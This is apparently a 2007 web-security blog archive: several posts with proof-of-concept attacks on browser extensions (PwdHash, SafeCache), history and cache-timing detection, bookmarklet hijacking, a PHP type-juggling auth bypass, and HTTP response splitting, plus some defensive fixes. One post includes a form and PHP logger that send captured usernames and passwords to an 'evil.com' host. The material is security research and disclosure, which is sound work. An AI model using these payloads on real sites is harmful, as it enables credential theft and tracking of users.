Monday, February 26, 2007

stopgetpass.user.js - an interim solution

A couple of days ago I posted a method of breaking the RCSR fix Mozilla implemented in Firefox. Today, I want to post an interim fix for the issue in the form of a Greasemonkey script:

// Loop through all the forms on the page.
for (var i = 0, c = document.forms.length; i < c; i++) {
    if (document.forms[i].method == 'get') {
        var password = false;
        // Check whether this form contains a password field.
        for (var l = 0, k = document.forms[i].elements.length; l < k; l++) {
            if (document.forms[i].elements[l].type == 'password') {
                password = true;
            }
        }
        // If it does, force the form to submit via POST.
        if (password == true) {
            document.forms[i].method = "post";
        }
    }
}


Essentially it just loops through all the forms on a page and sets the method to post on any form with a password field. So while this will stop the attack I described, it will most likely break sites; once a patch comes out of Mozilla (which I honestly hope will happen, because otherwise all their efforts on the previous patch will be in vain), this script should be removed.

Also, since this script extracts the method and type values from the DOM, it doesn't have to worry about case, obfuscation, etc, so it should not be vulnerable to any obfuscation of either property.

I'm sure you all know how to install Greasemonkey scripts, so I'm not going to bother explaining how to here; for those who don't, there's always Google.

P.S. 50th Post! Hurray, I've managed to actually stay interested in something for an extended period of time. I'm sure that some of the posts were completely uninteresting to people, but I hope that some of them weren't.

More Authenticated Redirect Abuse

A while ago I wrote two posts entitled Detecting Logged In Users and More Logged In User Detection via Authenticated Redirects.

Today I want to expand a bit more on how Authenticated redirects can be abused.

I want to talk about how you can abuse authenticated redirects which only redirect to certain domains (i.e. not yours), without being stopped by extensions such as SafeHistory and SafeCache.

If we can redirect to any resource on a server it is quite reasonable to assume that we can redirect to either an image or a piece of javascript.

First of all, let's say our redirection script at http://target.com/redir.php looks like this (ignore the fact that on an old version of PHP it would be vulnerable to response splitting, and the fact that parse_url doesn't validate URLs):

<?php

session_start();

// Only honour the redirect parameter for logged in users.
if ($_SESSION['logged_in'] == true) {
    if ( is_string($_GET['r']) ) {
        $url_array = parse_url ($_GET['r']);
        // Only allow redirects back to this server.
        if ($url_array['host'] == $_SERVER['SERVER_NAME']) {
            header ("Location: " . $_GET['r']);
            die();
        }
    }
}

// Everyone else just gets sent to the front page.
header ("Location: http://" . $_SERVER['SERVER_NAME'] . "/index.php");

?>


Knowing that we can redirect to any resource on the server we can create something like the following:

<html>
<body>
<img src="http://target.com/redir.php?r=http://target.com/images/logo.png" onload="alert('logged in');" onerror="alert('not logged in');" />
</body>
</html>


We could also redirect to JavaScript files and overwrite the functions they call, so that we know when they execute, but that's a whole lot more work.
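For example, here's a minimal sketch of that idea, assuming (hypothetically) that http://target.com/js/user.js exists on the target and calls a global setUser() function when it loads:

<html>
<body>
<script>
// Define the function the target's script calls; if the redirect succeeds
// (i.e. the user is logged in), user.js loads and calls it.
function setUser(name) {
    alert('logged in');
}
</script>
<script src="http://target.com/redir.php?r=http://target.com/js/user.js"></script>
</body>
</html>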

Also, one other thing I failed to mention in either of the two previous posts is that the technique I described in them can be used in any situation where something is loaded into the history, which includes iframes, popups, etc - but those are of course much less common.

Saturday, February 24, 2007

Fixing IE Content-Type Detection Issues: Output Filtering Instead Of Input Validation

[EDIT](25/02/07): It seems that this method doesn't completely work, so please read the comments to find more info, because otherwise this isn't going to do you any good.

There's been a bit of discussion over at sla.ckers.org about injecting Javascript into uploaded image files, and having IE detect the content type as text/html rather than the content-type sent by the server. For anyone who isn't familiar with the issue, I recommend you read the following post: http://www.splitbrain.org/blog/2007-02/12-internet_explorer_facilitates_cross_site_scripting Not because it's the first mention of the issue, but because it's the best and most technical description I've seen.

Anyway; to take a leaf out of Sylvan von Stuppe's book, I'd like to recommend a way to do (the equivalent of) output filtering, rather than input validation to stop this issue.

First of all, let's take a look at why we would ever do input validation to stop XSS attacks. The only reason we have ever had to do input validation is to allow people to input HTML while stopping them from inputting Javascript.

In all other situations, where we don't need to allow certain HTML, we can simply encode all output in the appropriate character set, and we're safe.

And there is no reason we would ever need to allow users to upload images which get interpreted as HTML files, and served as such.

So, having established (at least in my view), that output filtering is the way to go; how would we go about doing this without altering the image?

Well, in this case it's easy enough; all we need to do is use a header that IE does respect: the Content-Disposition header. We may also want to send a Content-Type header of application/octet-stream, depending on how paranoid we are and how much we're willing to (possibly) break.

There are several ways to do this.

On Apache, the best solution is to use mod_headers to send the header for all files in a particular directory, and move all your uploads there.
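For example, a minimal sketch of the mod_headers approach (the directory path is illustrative, and mod_headers must be enabled):

<Directory "/var/www/html/uploads">
    Header set Content-Disposition "attachment"
</Directory>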

Microsoft provides an explanation of how you can achieve the same on IIS here: http://support.microsoft.com/kb/q260519/

You can of course also set PHP or any other server side language as the handler for all the files in a directory, and then use the header() (or similar) function to send the Content-Disposition header to the browser.
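A minimal sketch of such a handler (the parameter name and upload path are hypothetical):

<?php

// Serve an uploaded file with headers that stop IE treating it as HTML.
$file = basename($_GET['f']); // basename() strips any path components

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file . '"');

readfile('/var/www/uploads/' . $file);

?>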

Of course, this might be annoying if a user does something like right-click on an image and choose View Image, but that is a minor inconvenience IMO.

Breaking Firefox's RCSR Fix

In Firefox 2.0.0.2, the developers have done a lot of good in regards to helping prevent XSS and other attacks against the client; you can read the whole advisory here: http://www.mozilla.org/security/announce/2007/mfsa2007-02.html

And while their fix for the RCSR issue is good, it's not perfect.

As everyone (including people commenting on Mozilla's bug tracker) noticed, there is no real way to prevent this if an attacker can execute Javascript on the domain, because he can simply inject an iframe whose src attribute points to the page the user normally logs in on, and then change its contents to get the password.

Anyway; this fix attempts to solve the issue of an attacker being able to abuse the password manager if the attacker can inject HTML, but not Javascript. And so, those are the constraints within which we need to break the fix.

Let's assume we have an HTML injection issue in a page called http://site.com/vuln.php in the GET parameter search; i.e. http://site.com/vuln.php?search=<img src=http://evil.com/image.jpg> would inject an image into the page.

What we can then do is inject a form into the page which looks like this:

<form action="http://site.com/vuln.php" method="get">
    <input type="text" name="username" />
    <input type="password" name="password" />
    <input type="hidden" name="search" value="<img src='http://evil.com/log.php' />" />
    <input type="submit" value="Login" />
</form>


If we get the user to submit the form, the Referers sent to http://evil.com/log.php will have the username and password in them.

Of course, our form would also need something like a transparent image input covering the whole browser window (or similar) to get the form submitted, but that problem has already been solved, and I wanted to keep the example clean.
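On the receiving end, log.php only needs to read the Referer header; a minimal sketch (the log file name is illustrative):

<?php

// The Referer will look like:
// http://site.com/vuln.php?username=...&password=...&search=...
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$parts = parse_url($referer);
parse_str(isset($parts['query']) ? $parts['query'] : '', $params);

if (isset($params['username']) && isset($params['password'])) {
    file_put_contents('creds.txt',
        $params['username'] . ':' . $params['password'] . "\n",
        FILE_APPEND);
}

// Return an innocuous response so the 'image' doesn't look odd.
header('Content-Type: image/gif');

?>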

On Disclosure

Firstly, just so that you understand my bias, my view on this topic is as follows:


  • I don't care how unethical disclosure is; if it interests me, and possibly others I'll post it.

  • I have no responsibility to give a vendor who has written insecure software time to fix their flaws - they've had time ever since they started writing it.

  • I also have no responsibility to contact them about any issues either.

  • I have no need to justify my position to anyone, and it won't change unless I get paid for it to change.



Anyway; Sid wrote a post on blogs.securiteam.com, entitled Accidental backdoor by ISP, about how an ISP had backdoored its customers' routers to make administration easier, which generated a bit of heat from some people, especially Cd-MaN.

He goes on about how Sid's post was unethical because, by mentioning which ISP it was, which subnet they owned, and what the passwords were, it didn't help anyone other than people who would want to attack the ISP.

Now, arguing on Cd-MaN's terms, there are people it helps. It helps anyone who wants to do some further investigation of the issue. It helps anyone who has an account with that ISP to secure themselves. I see no reason why it has to be disclosed in such a way that it would reach the majority of affected users; it's not our responsibility to fix other people's mistakes, and it never should be.

It also helps raise awareness of an issue which hasn't got much (if any) air time before. Because if you read any of the SpeedTouch manuals you will notice that the routers have a default remote administrator account, which most users never know about. Furthermore, I'm willing to bet that most ISPs who use SpeedTouch routers all have the same remote admin passwords.

And it really doesn't help anyone to say things like (http://hype-free.blogspot.com/2007/02/full-disclosure-gone-bad.html):
But this recent post on security team screams of the "I'm 1337, I can use nmap, I rooted 14716 computers" sentiment.

Because all it does is spread FUD. If Cd-MaN had bothered reading the post carefully, he would have noticed that all I did was run an nmap scan to determine how many of the hosts in that subnet were running telnet. I think the real number is higher than 14716 though, because my wireless network is dodgy and prone to giving out halfway through something, and considering that that scan took hours (unattended), I wouldn't be surprised if it had missed whole chunks.

Oh and he also says:
How does disclosing this flaw with such detail (like subnet addresses and the ISP name) help anyone? The story would have been just as interesting would he left those details out.

I have no real argument here, but I see nothing interesting in someone posting that some ISP somewhere has used the same remote admin password on all its routers. That's not exactly something we can argue about though, since it's just like arguing about which TV show is better.

Tuesday, February 20, 2007

Gotcha!: A PHP Oddity (with contrived security implications)

A while ago, I was looking over some code a friend of mine (who doesn't write much PHP) had written, which 'worked', but really shouldn't have.

It looked something like this:

if (strpos ($string, "needle") == "needle") {
    print "Is Valid";
}


And if you know PHP, you'll know that strpos always returns an integer or Boolean false (i.e. it should never return a string), so how the hell could this work?

Well, skipping my usual anecdote; it turns out that PHP casts strings to integers when doing comparisons between strings and integers (not the other way around, as I would have expected), and so "needle" got cast to an integer, which made it equal to 0. (And since strpos was returning 0, the above code worked.)
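A quick demonstration of the cast (this is the behaviour of the PHP versions current at the time of writing):

<?php
var_dump("needle" == 0);  // bool(true): "needle" is cast to (int) 0
var_dump(strpos("needles", "needle") == "needle"); // bool(true): 0 == (int) "needle"
var_dump(strpos("needles", "needle") === 0); // bool(true): the correct check
?>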

<Edit> (21/02/07): I realise that there should never be a double dollar vulnerability anywhere in your code, but mistakes are made, this is just what I thought was a curiosity which would interest people; clearly I was wrong. Also, while this uses a double dollar vuln, it is the only way I could come up with to get a string to be compared to an integer (rather than a decimal string) you control.
</Edit>

Now, for the very contrived security issue:

<?php

$authenticated = 0;
session_start();

if (isset($_SESSION['password'])) {
    if ($_SESSION['password'] == "password removed from backup") {
        $authenticated = 1;
    }
} elseif (isset ($_GET['password'])) {
    if ($$_GET['password'] == "password removed from backup") {
        $authenticated = 1;
    }
}

if ($authenticated == 1) {
    print "You Win!";
} else {
    print "You Fail!";
}

?>


You'll see the code above has a double dollar vulnerability, which would seem unexploitable in this scenario because the password string is hard coded rather than stored in a variable. But since, at this point, the variable $authenticated is equal to zero, we can set $_GET['password'] to "authenticated", so that $$_GET['password'] is equal to zero, and the comparison succeeds; i.e. simply requesting the page with ?password=authenticated prints "You Win!".

Note: The double dollar vuln is needed, rather than just passing 0 to a normal comparison, because all variables sent over HTTP are strings.

Note2: It doesn't matter in what order the arguments are typed in the comparison, i.e. the following would also be vulnerable:
if ("password removed from backup" == $$_GET['password']) {

Monday, February 19, 2007

You call that a game? This is a......

Firstly; sorry for the lack of updates, I've really been too busy to come up with anything interesting to write, and haven't found anything particularly interesting to write about.

Now, onto the bad title. I found the following "game" on digg: http://crackquest.ultramuffin.com/index.php and decided to see exactly how effective the SHA-1 rainbow tables I had found were.

Now, the first thing I tried was http://www.shalookup.com/ since you can crack up to 50 hashes at a time (50 being the limit per IP). So I ran the list of hashes against shalookup.com (using a proxy for the second 50) and got quite good results; I think that at least 50 (I wasn't counting) of the hashes I cracked came from shalookup.com.

After this I ran the remaining hashes against http://www.hashreverse.com/ and http://md5.rednoize.com/ and was able to crack a further 20 hashes.

I tried running the remaining 30 against http://www.md5encryption.com/, but got no results (which doesn't really say anything, since the only ones left were the ones no-one else could get). I got interrupted while running the hashes against http://hashcrack.905tech.com/cracker.php, which went down while I was away; I don't have an account on http://rainbowcrack.com/ (if anyone does, I'd really appreciate it if you got in contact with me), and http://passcrack.spb.ru/ seems to be down for maintenance.

So while this little anecdote can't testify to the usefulness of any single site (other than shalookup.com), it clearly illustrates that it doesn't matter what hashing algorithm you use if you do not salt the data first, and your users use poor passwords. But we already knew that, so *shrug*.

Tuesday, February 13, 2007

Attacking Aspect Security's PDF UXSS Filter

While this is not really much of an issue any more, because Adobe have released an update and there isn't really much to say, I'd like to revisit it for a moment.

There were a lot of people (myself included) who had considered the PDF UXSS issue unsolvable at the server-side level; how wrong we were: http://www.owasp.org/index.php/PDF_Attack_Filter_for_Java_EE

I have no real analysis of it because, as far as I can tell, it's bullet proof. Or at least it would be if browser security didn't have fist-sized holes in it. From a black box perspective where there is no information leakage, that fix is great.

But sadly, there are ways to simply obtain the data. Using an Anti-DNS Pinning attack, it should not be a problem to send a request to the server's IP with the appropriate Host header, etc, then parse out the link and redirect the user. I'm not going to bother providing any code, because there's really nothing new here, just another misfortune.

So a very good idea, is practically useless, simply because the rest of our security model is shot to bits.

A Better Web Cache Timing Attack

I've been thinking on whether I should bother writing an actual paper on this or not, but when I found that Princeton had already written a pretty decent paper on Web Cache timing attacks back in 2000, which you can find here: http://www.cs.princeton.edu/sip/pub/webtiming.pdf I decided against it.

If you read the paper, you will see that the attack relies on the use of two images which are only displayed together: you time the load of one image, then load a page which caches both images, then time the load of the second image. If there is a dramatic difference between the two timings, the first image had not been cached, and the user had therefore not visited the page; whereas if there is no significant difference, the image was already cached, and the page had been viewed before.

Now, this suffers from the fact that you actually need two images which are ONLY displayed together, because otherwise your results will be erroneous; and not only that, it requires that the images are approximately the same size so that your inferences about cache state are accurate.

A much better solution is to be able to determine the time it takes to retrieve a cached and non-cached version of an image by supplying request parameters, e.g. http://www.example.com/image?test=123456

The first thing we do is generate a random request string and make a request for the image with it; this gives us the approximate time it takes to get the image when it is not cached. We then make a second request to see how long the image takes to load when it is cached. By generating a large number of query strings to test, we can average these timings for better accuracy.

We then make a request for the image without any request parameters, see which averaged value it is closer to, and thereby determine the cache state.
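A minimal sketch of the idea in Javascript (the image URL is illustrative, and the simple halfway threshold stands in for the averaging described above):

<script>
// Time how long an image takes to load, then hand the result to a callback.
function timeLoad(src, callback) {
    var start = new Date().getTime();
    var img = new Image();
    img.onload = img.onerror = function () {
        callback(new Date().getTime() - start);
    };
    img.src = src;
}

var target = 'http://www.example.com/image.png';

// 1. Measure an uncached load by using a random query string.
timeLoad(target + '?test=' + Math.floor(Math.random() * 1000000), function (uncached) {
    // 2. Time the real URL and compare.
    timeLoad(target, function (actual) {
        alert(actual < uncached / 2 ? 'probably visited' : 'probably not visited');
    });
});
</script>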

This benefits from the fact that only one image is needed, so we can find a page with a large photo or similar to give us a greater margin of error; and we also do not need to find a page with two images of equal size, because we are always making requests for the same image.

Sadly it's not quite as effective as the attack against the SafeCache extension, but that's why it's a timing attack I guess, :)

Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, and troopa is now using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially it extends the browser same origin policy to the browser cache to defend against cache timing attacks. You can find more info about it here: http://www.safecache.com/

Now while I have not looked at the source code of the extension, I have devised a method for not only being able to perform timing attacks, but to be able to directly determine whether or not the objects you are trying to find info about are in the cache.

It seems that if you create an iframe element whose src attribute points to the resource whose cache state you want to query, the onload event will fire only if the item is not in any cache.

To test this, either log in to Gmail, or go to http://mail.google.com/mail/help/images/logo.gif and then create a page like the following:

<html>
<body>
<script>
function loaded() {
    var time = new Date();
    var t2 = time.getTime();
    alert(t2 - t1);
}
var time = new Date();
var t1 = time.getTime();
</script>
<iframe src="http://mail.google.com/mail/help/images/logo.gif" onload="loaded()">
</iframe>
</body>
</html>



And you will notice that the onload event does not fire. Then if you press Ctrl+Shift+Del and delete the cache, and visit the html page you just created again, the onload event will fire.

If you refresh the page, the onload event will not fire a second time because the image is already in the cache.

So while it stops standard cache timing attacks, it does not stop attacks against itself.

Anatomy of a Worm by Kyran

From http://kyran.wordpress.com/2007/02/10/paper-anatomy-of-a-worm/:
It’s about the worm I wrote targeting GaiaOnline.com, aptly named ”gaiaworm”. This is the third version of the worm and the first time I’ve ever really written a paper.


It's an interesting paper that details what he has coined a "Pseudo-Reflective" worm: while it uses a reflected XSS vector, it uses a persistent on-site spreading mechanism - in this case the PM system.

Solving Password Brute Force And Lockout Issues

Locking users out of sites by exhausting a limited number of login attempts has always been a pet peeve of mine; not only because you can sometimes forget which particular password you used, but also because it becomes quite easy to perform a DoS attack against someone's account simply by locking them out via failed login attempts. I thought most websites had done away with this; not so Sudo Labs, it seems. Now, I'm not about to take responsibility for this, since it isn't our code base and we didn't even think it would be set up this way, but when I was talking to Kyran I found out that (much to our chagrin) he had gotten locked out.

Which got me thinking; why can't we have an over-ride code to allow people to log in even when their account is being attacked? As I see it there's no reason we can't; we can even re-use existing code to achieve it.

These days when you want to sign up for most sites you get sent an email with an activation code/link which you have to use so that your account is activated, and we know you own the account.

Now, if we were to use the current lockout system, but give users an option to request a special login code, the normal functionality would keep working most of the time; but when a user's account is being DoS-ed they would not be locked out, because they can simply request a login code and use it to bypass the lockout, as in the sketch below. Of course, this cannot be used by email vendors, who are already the crux of most of our identification, so it's not much of an extra burden.
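A minimal sketch of the idea in PHP, with every helper function hypothetical:

<?php
// Hypothetical helpers: check_password(), record_failed_attempt(),
// failed_attempts(), valid_override_code(), email_override_code(),
// log_user_in().
$user = $_POST['username'];

if (!check_password($user, $_POST['password'])) {
    record_failed_attempt($user);
} elseif (failed_attempts($user) < 5) {
    log_user_in($user); // normal login path
} elseif (isset($_POST['code']) && valid_override_code($user, $_POST['code'])) {
    log_user_in($user); // locked out, but the emailed one-time code overrides it
} else {
    email_override_code($user); // offer the override code via email
}
?>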

Bookmarklets are NOT secure

Jungsonn wrote a post entitled "Defeating Phishers" where he wrote about how one could distribute risk across two servers, and essentially have one site where XSS vulnerabilities are unimportant, and one which would need to be audited heavily. He also recommended using Bookmarklets because "Bookmarklets are actually pretty secure things, no software or website can access them.".

Personally, I disagree with both those statements. Firstly, if you find an XSS hole in the main domain, you can easily make the page say that they've changed their practices; sure, it would be a little odd, but the amount of user education required to make this attack impractical would be enough to solve the whole phishing issue, not just this one.

But more importantly, I want to debunk the myth that bookmarklets are secure. Leaving aside the fact that trojans and similar can easily alter them because they have access to the file system, they are still insecure: they are exactly as insecure as the page they are clicked on is untrustworthy.

For example, let's take the bookmarklet Jungsonn posted:
javascript:QX=document.getSelection();if(!QX){void(QX=prompt('Type your firstname',''))};if(QX)document.location='https://myonlinebank.com'

It would seem fairly secure, except for the fact that, given how permissive Javascript engines are, we can stop it from working. Here's how:
<script>
// Gecko's watch() lets us intercept assignments to a property; the handler
// receives (property, old value, new value) and returns the value to set.
function changeHandler(prop, oldval, newval) {
    if (newval == 'https://myonlinebank.com') {
        return 'https://myonlinebank.com.us';
    } else {
        return newval;
    }
}

document.watch('location', changeHandler);
</script>


If the bookmarklet is clicked on a page with that code on it - say a phishing page at http://myonlinebank.com.us, or a legitimate page on the http://myonlinebank.com domain if it has an XSS hole in it - then we can easily send the user to a phishing page, even though the value is hard coded in the bookmarklet.

Of course, the bookmarklet can try to detect and remove such things, but it's a technological battle that will be fought on a bookmarklet by bookmarklet basis, which is essentially where security generally fails - custom code. The other scenario is that we find a secure method of redirecting users, but even if we do, we're not going to be able to get everyone to use it; so I'd rather not recommend bookmarklets as security, and just tell users to create a simple bookmark to the site.

Or we could try to educate users to only click on the bookmarklet from a blank page, but that's another area where security generally fails - user education.

Friday, February 09, 2007

XSSed.com - XSS Archive w/ Mirror

One thing that I've always thought web app sec was missing, which network sec had, was a defacement/attack archive with a mirror - something like Zone-H, but for XSS exploits - especially after Acunetix decided to pretend that the flaws that had been found and posted on sla.ckers.org had never existed.

Well, today I found a site called XSSed.com which contains an XSS attack archive, with a mirror, which greatly resembles Zone-H; but that can only be good, since no-one has to figure out a new interface.

Personally, I think we should give them our support, because without any way to verify vulnerability claims, vendors will still be able to sweep things under the rug and lie their way through everything. An unbiased 3rd party is probably a great way to do so.

Sunday, February 04, 2007

This Week in Sec

Excuse the bad pun of a title, but I couldn't come up with anything better. Anyway, as with my last posting of links, it's not exactly a week; it's probably closer to "the interesting links I've found since I last posted a set of links". So here goes:

.aware alpha zine
The people over at awarenetwork.org have released an ezine, it has nothing to do with web apps, but its still quite good. To quote the front page:
Hello and welcome to the first .aware eZine ever to exist on planet
earth. Basically, with all the h0no wannabes out there and phrack down,
I thought there ought to be a little bit more actual infotainment spread
into cyperspace. This way, maybe not all of us will be driven into
criminal insanity by paranoid hallucinations.


Enjoy the zine.

PS: We're sorry for causing all that cancer.




CAPTCHA Recognition via Averaging
This article describes how certain types of captchas (such as the ones used by a German online-banking site) can be automatically recognized using software. The attack does not recognize one particular captcha itself but exploits a design error allowing to average multiple captchas containing the same information.


This was submitted to bugtraq, and so you can find the bit of discussion that went on about it here: http://seclists.org/bugtraq/2007/Jan/0648.html (note: this isn't just a single post, there are replies) and, because it got separated between the two months, here: http://seclists.org/bugtraq/2007/Feb/0000.html



Vista Speech Command Exposes Remote Exploit
Essentially some people found out that Vista doesn't do any cancellation of the audio which travels from the speakers to the microphone, so any commands your computer plays through the speakers will be picked up and, if you have voice commands activated, will be executed.



I didn't break it!
Matt Blaze posted a very good entry about how (crypto) researchers are often described as having cracked codes, and how this taints research. I think this also applies to security research just as much, except for the fact that generally most people say security researchers "broke" something rather than they "cracked" something. He also has another interesting post entitled James Randi owes me a million dollars which I think people should also read.



And in case you somehow managed to miss it:
Sudo Labs is up!
Sudo Labs is an attempt to create an R&D oriented forum where people can come to discuss any ideas they have about security, in an environment which focuses on new ideas and techniques rather than explaining old thoughts. Having said that, those who aren't experts are also welcome; they're just asked to contribute rather than clog the board with questions about known topics - there are many other boards which will teach you about security.



So that about wraps it up for interesting things I've found over the past week in regards to security, hopefully next time I'll have a better title, but I somehow doubt it.

Saturday, February 03, 2007

Samy Sued and Sentenced

Well, today we've found out that the creator of the MySpace Samy worm has been sued by MySpace and sentenced: http://www.scmagazine.com.au/news/45262,myspace-superworm-creator-sentenced-to-probation-community-service.aspx

I'm honestly lost for words, that comes as quite a shock to me.

Now clearly he has done something wrong (and now it seems - illegal), but I don't think anyone expected this. Especially considering that while it did spread, it was completely non-malicious.

For the moment I'm safe since I've never attacked MySpace, but frankly, I'm just worried that they're going to come after people who have disclosed vulnerabilities in MySpace next.

Friday, February 02, 2007

Attacking the PwdHash Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, and troopa is now using the domain for his blog, so I'm moving all the content here:




A while ago I saw an interesting paper/implementation of a way to hash and salt user passwords by domain, so that (I assume) phishing attacks would not be able to steal users' passwords because they are salted with the phishing domain rather than the targeted domain. You can find more info here: https://www.pwdhash.com/

If you read their paper, and the comments in the extension you'll see that they've got pretty much anything you can think of covered. One of the things they haven't been able to stop has been Flash based sniffers, because Javascript extensions don't have any control over 3rd party plugins.

But I have come up with a way to circumvent certain protections and possibly another attack.

To protect against context switching attacks, once a user presses the @@ combination or the F2 key in a password field, the context cannot be changed without alerting the user until at least 5 additional characters have been typed.

This is decent protection since you cannot steal the first 5 letters of a user's password, and since user passwords aren't particularly long those first 5 characters are vitally important.

But the extension developers made a few fatal mistakes: they allow the page to receive events for the @ key (though not for the F2 key), and they check how many characters there are in the text box by checking the DOM. Since we are not restricted from changing the DOM, we can easily change the contents of the password box.

So what we can do is: detect two presses of the @ key, quickly change the value of the password box to 'testing' or some similar string which is more than 5 chars long, set the focus to another element, then change the value of the password box back to two @ signs and put the user back in place. You get a little flicker, but most users will discount that. Anyway, here's an example:

<html>
<body>
<script language="javascript">

var text = document.createElement('div');
document.body.appendChild(text);
var last = null;

document.onkeypress = function (e) {
    var key = String.fromCharCode(e.charCode);
    // Two @ presses in a row: the user has just activated PwdHash.
    if (last == '@' && key == '@') {
        var pb = document.getElementById("pass");
        // Pad the box past 5 characters so the context switch is allowed.
        pb.value = '@@testing';
        window.setTimeout("context_switch();", 1);
    }
    text.innerHTML = text.innerHTML + key;
    last = key;
}

function context_switch () {
    var pb = document.getElementById("pass");
    var tb = document.getElementById("text");
    // Move focus away and back, then restore the @@ prefix for the user.
    tb.focus();
    pb.focus();
    pb.value = '@@';
}
</script>

<form>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden>
</form>
</body>
</html>


Another thing Firefox allows you to do is create events which can be sent to the DOM, and for some reason these do not go through extensions. This is a sort of double edged sword: while we cannot simulate a user typing to an extension, the extension is not aware of us sending events to the DOM.

And since the extension developers are sort of using the password box to store the password (the password box contains @@ABCDEFGH...etc, which gets mapped back to the text you entered when the extension computes the hash), we can insert text into the password box and have it included in the hash. And since we can inject the letters ABCD, etc, we can conduct an attack where we know that, say, each letter is repeated 3 times (by detecting keyboard events and then sending two of those events to the textbox again). This isn't a real attack atm, since I haven't looked at the hashing algorithm, but it should make any cryptanalysis easier if we can repeat any number of letters any number of times.

Also, if we think we can get the user to keep entering their password over and over again, we can just replace the textbox content with, say, @@AAAAA or @@BBBBB or @@CCCCC, so we get a hash of a single character repeated, and then we only need a simple 256 value lookup table.




Ok, I figured out a way to defeat the fact that we can't detect the F2 key being pressed.

It does have some false positives, but this is just to show that an attack is still possible.

Anyway, what we do is detect when we get sent an A, then check that the length of the text in the password box is > 0; if it is, we send 4 As to the password box, swap the context, and record some data. Then all we need is a 256 value lookup table. Anyway, here's the PoC:

<html>
<body>
<script language="javascript">

var text = document.createElement('div');
document.body.appendChild(text);

var enc0 = null;
var enc1 = null;

document.onkeypress = function (e) {
    var key = String.fromCharCode(e.charCode);
    if (key == 'A') {
        var pb = document.getElementById("pass");
        window.setTimeout("test_n_send();", 1);
    }
    text.innerHTML = text.innerHTML + key;
}

function test_n_send() {
    var pb = document.getElementById("pass");
    var tb = document.getElementById("text");
    if (pb.value.length > 0) {
        send4A();
        enc0 = pb.value;
        tb.focus();
        enc1 = pb.value;
        pb.focus();

        var enc0b = document.getElementById("enc0");
        enc0b.value = enc0;

        var enc1b = document.getElementById("enc1");
        enc1b.value = enc1;
    }
}

function send4A() {
    var i;

    for (i = 0; i < 4; i++) {
        var evt = document.createEvent("KeyboardEvent");
        evt.initKeyEvent(
            "keypress", // in DOMString typeArg,
            false,      // in boolean canBubbleArg,
            false,      // in boolean cancelableArg,
            null,       // in nsIDOMAbstractView viewArg, Specifies UIEvent.view. This value may be null.
            false,      // in boolean ctrlKeyArg,
            false,      // in boolean altKeyArg,
            false,      // in boolean shiftKeyArg,
            false,      // in boolean metaKeyArg,
            0,          // in unsigned long keyCodeArg,
            65);        // in unsigned long charCodeArg);

        var pb = document.getElementById("pass");
        pb.dispatchEvent(evt);
    }
}

</script>

<form>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden><br />
<input id=enc0><br />
<input id=enc1><br />
</form>
</body>
</html>

Thursday, February 01, 2007

HTTP Response Splitting Attacks Without Proxies

I've had this paper sitting around collecting dust for so long, but I've been keeping it for a reason: a friend (troopa) and I are trying to start a hacker/infosec community focused around research and development of ideas and attacks, rather than simply a teaching and learning ground for people; there are plenty of those already in existence, but very few places where people come together to collaborate on new ideas. And so I present to you Sudo Labs.

I initially posted the full paper on Sudo Labs here: http://sudolabs.com/forum/viewtopic.php?t=3

But now that I've directed a bit of traffic there (that really didn't help), I'm posting it here as well:

[EDIT (14/02/07)]: I've been informed, that my introduction was completely wrong and may have mislead people, and so I've replaced it.

HTTP Response Splitting Attacks Without Proxies


By kuza55
of Sudo labs

Contents:

1.0 Introduction
2.0 The Attack
    2.1 Theory
    2.2 Browser Inconsistencies
    2.3 Working Exploits
3.0 Implementation Notes
4.0 Conclusion

1.0 Introduction

At the moment, the only known technique (AFAIK - correct me if I'm wrong) for attacking the browser cache to alter the cache for pages other than the one vulnerable to HTTP Response Splitting is the one proposed by Amit Klein on pages 19-21 of this paper: http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

It utilises the fact that IE operates on only 4 connections to request pages from a single server.

This paper will illustrate something similar.

2.0 The Attack

As many people before me have discovered, if you can force the browser to make a request for a page on a connection you control, you can replace the contents of the page.

The problem has been to force the browser to do just that.

But what if we ask nicely?

2.1 Theory

If, in our doctored response, we redirect the user to another page on our site and send the browser the "Keep-Alive: timeout=300" and "Connection: Keep-Alive" headers, the browser does exactly what we asked and sends the next request on that connection (except Opera 9, which doesn't want to - Opera 8 does).

The next thing we need to do is send the browser a "Content-Length: 0" header, so that it thinks it has received everything it's going to get from its first request and sends the second request straight away.

We then send the browser a couple of new lines, then lots of extraneous spaces, then another new line.

This works much like a NOP sled in a buffer overflow attack: it prepares a landing zone which the browser will simply ignore before reading the actual response, which gives us greater flexibility in regards to browser inconsistencies and network latency issues.
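Laid out readably, the doctored response stream we are aiming for looks something like this (the status line and header values are illustrative; the working exploits in section 2.3 encode exactly this structure):

HTTP/1.x 302 Found
Location: index.html
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 0

[lots of extraneous spaces - the landing zone]
HTTP/1.x 200 OK
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 55

<html><script>alert(document.location)</script></html>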

2.2 Browser Inconsistencies



Sadly, not all browsers react the same way, so not everything can be done easily. Here's a little chart of what I've been able to produce in various browsers so far:

1 = Second request made on the same connection.
2 = Second Response can be injected into
3 = Headers can be injected into the second response
4 = Content-Length Header is strictly obeyed

+ = yes
~ = Sort of
- = No
x = N/A

-----------------
|Browser|1|2|3|4|
-----------------
|Opera 8|+|+|+|+|
-----------------
|IE 6   |+|+|+|~|
-----------------
|Firefox|+|+|-|x|
-----------------
|Opera 9|-|-|-|x|
-----------------

So essentially I've only really been able to exploit the attack's full potential under IE 6 and Opera 8. Getting this to work under Firefox (and possibly Opera 9) is a job for people with more experience in how browsers interact with the network.

The issue with Internet Explorer is that it reads responses in 1024 byte blocks, so any Content-Length headers which do not fall on that boundary will be rounded up to the nearest kilobyte; but that's not much of an issue.

Internet Explorer also has a 2047 byte limitation on query strings, so my original design of using new lines doesn't work, because they get encoded in the query string to 3 times their length (6 bytes - %0d%0a - instead of two), and so spaces had to be used as the whitespace to be ignored.

